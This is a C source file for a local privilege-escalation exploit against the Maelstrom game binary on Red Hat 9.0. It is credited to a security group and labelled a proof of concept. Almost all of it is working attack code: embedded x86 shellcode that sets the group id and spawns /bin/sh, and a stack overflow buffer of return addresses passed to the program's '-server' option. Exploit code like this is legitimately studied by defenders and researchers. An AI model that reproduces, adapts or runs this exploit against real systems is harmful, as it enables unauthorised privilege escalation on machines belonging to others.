/*  0x333maelstrom => Maelstrom local game exploit
 *
 *  proof-of-concept exploit tested against
 *  /usr/bin/Maelstrom under RH 9.0 
 *
 *  coded by c0wboy
 *
 *  (c) 0x333 Outsiders Security Labs / www.0x333.org
 *
 */


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAEL	"/usr/bin/Maelstrom"
#define SIZE	8177
#define ALIGN	3


unsigned char shellcode[] =

	"\x31\xc0\x31\xdb\x31\xc9\xb3\x14\xb1\x14\xb0\x47"
	"\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f"
	"\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b"
	"\xcd\x80";	



int main()
{
	int i;
	char out[SIZE];
	char *cya[2] = { shellcode, NULL };

	int *own = (int *)(out + ALIGN);

	int ret = 0xbffffffa - strlen(shellcode) - strlen(MAEL);

	for (i=0 ; i<SIZE-1 ; i+=4)
		*own++ = ret;

	out[0] = '3';
	out[1] = '@';
	out[2] = '3';

	fprintf (stdout, "\n ** /usr/bin/Maelstrom local game exploit vr.0.2\n");
	fprintf (stdout, " ** by c0wboy / www.0x333.org\n\n");

	execle (MAEL, MAEL, "-server", out, NULL, cya);
}